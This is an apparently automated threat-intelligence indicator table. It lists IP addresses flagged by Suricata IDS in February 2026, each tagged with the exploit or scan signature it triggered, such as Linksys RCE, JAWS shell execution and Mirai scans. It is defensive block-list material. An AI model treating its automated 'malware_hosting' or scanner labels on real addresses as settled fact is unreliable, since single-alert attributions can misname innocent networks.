11. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFxqvke9RZ-yxMb_EQidJASZPsTmwn4QI_Cm8PS6-ZWTN3TuSwbZ10RyLKomwNNyH_h2-e5n3QZkdzspQQBUoxqgGMALrIV6WQk-lyyLaCw9A==)
12. [microsoft.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHVezYgRY5XSmPPBf1OeTiqB9ovTiP66ySl1etorioDl76imU3oy1JckysuiN7KtpCa7XoINr3guY_14AntdUlrfgfgHHFemt3gMFwzp-pgxsFrqtBbq4hAgREUC6xXw4ypZh5PTTJq5XL1KMSMrd_78V_qs6iypF0b2wxRO20x1JRFa1GK8ftNz4ZjCvxovkVuj-9rJWJzI4_zFcY4TcJyuw==)
13. [lumen.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHyFf7D3T3vooSO_6utxzSBoPGJKsqFxvsW23fDOzJ21bc4CyILxCDNSluuk8j_BSoE69vvfDpZhH9UMpcGpHGss8ADjRO4WFs6zoq8KYsYsuq-yg8-R7cQa_mhpKq4k2NjQ_PlRNK7oLiCpUu7dDohtnrIOeNG8xZf7Q_4tWk=)
14. [ibm.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQERuG_qo8gmBB2GEcoEkexZGs_2S6byF4yJ0cRQRAIF4WBEtE8ESfS_LzE1XdmSLKaSLqCQI2SAsR0jdoIh7Qif62FSAwjFhimyn3zL3aNY6q8b5rzwMERsqCC0u3QSMvskj4JpVPZVXDG1PHDHbrTAIGDIwb5kQU91_Tc=)
15. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGfFEHKSzSnbstUCnrhj1eF84DqMIL4E7FJx6PP8Ju_DqpHRvvz-LjyngHSWMRX7Mm416UPwb-LTZSwBg7oKRTwRqmXCAGjJQn2rMDzMP04X2glAoAssV8Q3dp5QU1wfnWY)
16. [paloaltonetworks.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEXjJ5bmg5XBQycGwUvtEXR1cFG_MfXjjU6mjeRfEmEJxXOKA1XoZ2w0MNeox7XSOMGMmpISD43GIINPtZ-7txaXCpPiGYBaJbpl_yNRFujRE6RTjnpKTaG96mYpdUWJgdjrTPQaddnn_2LMvDGu7-dN_vkDD2HIHpD0buSok5ozbvld5o6kjlu3IPaDJCH-WcKFw==)
17. [awanpintar.id](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEZkLsOnX4pRIFyeFXrHnmMYefT5F9Z_ZnZpJCbQgn9FwZe2KECjQPQGE7pL4_ITEJmw5qdlrZ19mlVQUUCmdhfsVUfLK-zuj8SaStwY355-NcRisqUFyqNPE28nm7tx6VKItNb4fquQ0HehPmwjs57SS711_Jx_1iV7_Ttqzfe1PMyRfhhaKVFnnuaHPxnXYScrB3UbDIVANZOpYbCM_UXDdnIDaLhpA==)
STIX indicators
Filter, search, and copy indicators. Download the full STIX 2.1 bundle with GeoIP, ASN, threat scores, and MITRE ATT&CK mappings.
| Type | Value | Description | Labels | Valid from | |
|---|---|---|---|---|---|
| IPv4 | 65.49.1.146 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-01 | |
| IPv4 | 184.105.247.216 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-02 | |
| IPv4 | 112.196.109.146 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=7; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11910 anomalous ICMPv4 type 3,code 4 Path MTU Discovery; cc=IN; asn=17917; asn_org=Quadrant Televentures Limited | malware_hosting | 2026-02-02 | |
| IPv4 | 27.47.2.190 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=CN; asn=17622; asn_org=China Unicom Guangzhou network | scanning_host | 2026-02-02 | |
| IPv4 | 42.53.17.247 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=60001; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone | scanning_host | 2026-02-03 | |
| IPv4 | 185.93.89.75 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=52869; cc=IR; asn=213790; asn_org=Limited Network LTD | malware_hosting | 2026-02-03 | |
| IPv4 | 201.205.247.46 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=CR; asn=11830; asn_org=Instituto Costarricense de Electricidad y Telecom. | scanning_host | 2026-02-03 | |
| IPv4 | 65.49.1.189 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-03 | |
| IPv4 | 185.218.127.48 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11910 anomalous ICMPv4 type 3,code 4 Path MTU Discovery; cc=AU; asn=212238; asn_org=Datacamp Limited | malware_hosting | 2026-02-03 | |
| IPv4 | 74.82.47.33 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-04 | |
| IPv4 | 117.196.171.24 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=7574; cc=IN; asn=9829; asn_org=National Internet Backbone | scanning_host | 2026-02-04 | |
| IPv4 | 176.65.134.22 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=8080; cc=SI; asn=36680; asn_org=Netiface LLC | malware_hosting | 2026-02-05 | |
| IPv4 | 65.49.1.18 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-05 | |
| IPv4 | 61.3.96.85 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=49152; cc=IN; asn=9829; asn_org=National Internet Backbone | scanning_host | 2026-02-05 | |
| IPv4 | 8.210.16.217 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=HK; asn=45102; asn_org=Alibaba US Technology Co., Ltd. | scanning_host | 2026-02-05 | |
| IPv4 | 76.22.2.74 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=8080; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC | malware_hosting | 2026-02-05 | |
| IPv4 | 159.117.50.240 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=8080; cc=US; asn=36105; asn_org=Big Bend Telephone Company, Inc. | malware_hosting | 2026-02-06 | |
| IPv4 | 47.5.105.168 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=8080; cc=US; asn=33588; asn_org=Charter Communications LLC | malware_hosting | 2026-02-06 | |
| IPv4 | 184.105.247.238 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-06 | |
| IPv4 | 50.236.117.51 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=8080; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC | malware_hosting | 2026-02-06 | |
| IPv4 | 78.142.229.7 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=8080; cc=NL; asn=3214; asn_org=xTom GmbH | malware_hosting | 2026-02-06 | |
| IPv4 | 199.36.89.178 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=8080; cc=US; asn=13370; asn_org=Ziply Fiber | malware_hosting | 2026-02-06 | |
| IPv4 | 209.173.252.98 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=5500; cc=US; asn=394437; asn_org=PS Lightwave | scanning_host | 2026-02-07 | |
| IPv4 | 47.44.12.190 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=8080; cc=US; asn=20115; asn_org=Charter Communications LLC | malware_hosting | 2026-02-07 | |
| IPv4 | 68.34.167.163 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=8080; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC | malware_hosting | 2026-02-07 | |
| IPv4 | 58.177.153.58 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=8080; cc=HK; asn=9269; asn_org=Hong Kong Broadband Network Ltd. | malware_hosting | 2026-02-07 | |
| IPv4 | 65.49.1.184 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-07 | |
| IPv4 | 223.123.43.5 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=PK; asn=138423; asn_org=CMPak Limited | scanning_host | 2026-02-07 | |
| IPv4 | 5.2.231.4 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound; ports=8080; cc=RO; asn=8708; asn_org=Digi Romania S.A. | malware_hosting | 2026-02-07 | |
| IPv4 | 216.218.206.126 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-08 | |
| IPv4 | 36.49.65.8 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=CN; asn=4134; asn_org=Chinanet | scanning_host | 2026-02-08 | |
| IPv4 | 27.47.1.198 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=CN; asn=17622; asn_org=China Unicom Guangzhou network | scanning_host | 2026-02-08 | |
| IPv4 | 202.102.141.85 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone | scanning_host | 2026-02-08 | |
| IPv4 | 182.60.9.235 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=8080; cc=IN; asn=9829; asn_org=National Internet Backbone | scanning_host | 2026-02-08 | |
| IPv4 | 91.205.185.100 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11910 anomalous ICMPv4 type 3,code 4 Path MTU Discovery; cc=NO; asn=50304; asn_org=Blix Solutions AS | malware_hosting | 2026-02-09 | |
| IPv4 | 65.49.20.96 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-09 | |
| IPv4 | 65.49.1.177 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-10 | |
| IPv4 | 122.99.49.35 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=7574; cc=TW; asn=9416; asn_org=Hoshin Multimedia Center Inc. | scanning_host | 2026-02-10 | |
| IPv4 | 193.46.255.113 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Denial of Service; sigs(top)=GPL VOIP SIP INVITE message flooding; ports=5060; cc=RO; asn=47890; asn_org=Unmanaged Ltd | scanning_host | 2026-02-10 | |
| IPv4 | 65.49.20.94 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-11 | |
| IPv4 | 8.219.103.247 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd. | scanning_host | 2026-02-11 | |
| IPv4 | 36.255.40.226 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd. | scanning_host | 2026-02-12 | |
| IPv4 | 65.49.1.75 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-12 | |
| IPv4 | 61.140.125.223 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=7574; cc=CN; asn=4134; asn_org=Chinanet | scanning_host | 2026-02-12 | |
| IPv4 | 103.38.52.71 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=49152; cc=IN; asn=135761; asn_org=Userlinks Netcom Pvt. Ltd. | scanning_host | 2026-02-12 | |
| IPv4 | 64.62.197.123 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-13 | |
| IPv4 | 1.34.85.243 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible VXWORKS Urgent11 RCE Attempt - Illegal Urgent Flag; ET EXPLOIT Possible VXWORKS Urgent11 RCE Attempt - Urgent Flag; ports=7121; cc=TW; asn=3462; asn_org=Data Communication Business Group | malware_hosting | 2026-02-13 | |
| IPv4 | 64.62.156.126 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-14 | |
| IPv4 | 64.62.197.198 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-15 | |
| IPv4 | 80.87.206.71 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible VXWORKS Urgent11 RCE Attempt - Urgent Flag; ports=54182; cc=RU; asn=16276; asn_org=OVH SAS | malware_hosting | 2026-02-15 | |
| IPv4 | 59.103.100.94 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd. | scanning_host | 2026-02-15 | |
| IPv4 | 175.107.205.153 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd. | scanning_host | 2026-02-15 | |
| IPv4 | 103.158.171.55 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=49152; cc=IN; asn=17665; asn_org=ONEOTT INTERTAINMENT LIMITED | scanning_host | 2026-02-15 | |
| IPv4 | 64.62.156.138 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-16 | |
| IPv4 | 223.123.42.189 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=PK; asn=138423; asn_org=CMPak Limited | scanning_host | 2026-02-16 | |
| IPv4 | 124.29.194.37 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd. | scanning_host | 2026-02-16 | |
| IPv4 | 64.62.156.145 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-17 | |
| IPv4 | 139.5.0.65 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=49152; cc=IN; asn=24186; asn_org=RailTel Corporation of India Ltd | scanning_host | 2026-02-17 | |
| IPv4 | 65.49.1.200 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-18 | |
| IPv4 | 125.163.136.91 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=5555; cc=ID; asn=7713; asn_org=PT Telekomunikasi Indonesia | scanning_host | 2026-02-18 | |
| IPv4 | 223.123.42.190 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=PK; asn=138423; asn_org=CMPak Limited | scanning_host | 2026-02-18 | |
| IPv4 | 103.72.9.169 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=49152; cc=IN; asn=151729; asn_org=SWIFTIFY PRIVATE LIMITED | scanning_host | 2026-02-18 | |
| IPv4 | 27.215.214.105 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone | scanning_host | 2026-02-18 | |
| IPv4 | 204.216.147.144 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=20; categories=Attempted Administrator Privilege Gain,Potential Corporate Privacy Violation; sigs(top)=ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902 Attempt M1; ET EXPLOIT Multiple DrayTek Products Pre-authentication Remote RCE Inbound (CVE-2020-8515) M2; ET INFO Cleartext WordPress Login; ports=16992; cc=BR; asn=31898; asn_org=Oracle Corporation | malware_hosting | 2026-02-19 | |
| IPv4 | 65.49.1.133 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-19 | |
| IPv4 | 185.55.240.152 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=20; categories=Attempted Administrator Privilege Gain,Potential Corporate Privacy Violation; sigs(top)=ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902 Attempt M1; ET EXPLOIT Multiple DrayTek Products Pre-authentication Remote RCE Inbound (CVE-2020-8515) M2; ET INFO Cleartext WordPress Login; ports=50000; cc=DE; asn=199912; asn_org=Layer7 Networks GmbH | malware_hosting | 2026-02-19 | |
| IPv4 | 165.22.54.172 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=SG; asn=14061; asn_org=DigitalOcean, LLC | scanning_host | 2026-02-20 | |
| IPv4 | 111.70.13.127 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=8080; cc=TW; asn=17421; asn_org=Mobile Business Group | scanning_host | 2026-02-21 | |
| IPv4 | 175.107.208.54 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=60001; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd. | scanning_host | 2026-02-21 | |
| IPv4 | 103.93.93.211 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=8080; cc=ID; asn=141140; asn_org=PT Jinde Grup Indonesia | scanning_host | 2026-02-21 | |
| IPv4 | 27.193.68.154 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=7574; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone | scanning_host | 2026-02-22 | |
| IPv4 | 65.49.1.101 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-22 | |
| IPv4 | 27.43.205.226 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=CN; asn=17816; asn_org=China Unicom IP network China169 Guangdong province | scanning_host | 2026-02-22 | |
| IPv4 | 117.215.213.15 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=IN; asn=9829; asn_org=National Internet Backbone | scanning_host | 2026-02-23 | |
| IPv4 | 77.247.88.120 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=2; categories=Attempted Administrator Privilege Gain,Web Application Attack; sigs(top)=ET SCAN JAWS Webserver Unauthenticated Shell Command Execution; ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=AL; asn=216046; asn_org=Tele.Co.Albania SHPK | scanning_host | 2026-02-23 | |
| IPv4 | 65.49.1.174 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-23 | |
| IPv4 | 184.105.139.89 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-24 | |
| IPv4 | 65.49.1.126 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free; cc=US; asn=6939; asn_org=Hurricane Electric LLC | malware_hosting | 2026-02-25 | |
| IPv4 | 117.209.28.183 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=49152; cc=IN; asn=9829; asn_org=National Internet Backbone | scanning_host | 2026-02-25 | |
| IPv4 | 103.207.224.159 | High & Medium Suricata IDS Source / seen in Suricata IDS alerts; events=1; categories=Attempted Administrator Privilege Gain; sigs(top)=ET SCAN Mirai Variant User-Agent (Inbound); ports=80; cc=IN; asn=24186; asn_org=RailTel Corporation of India Ltd | scanning_host | 2026-02-26 | |
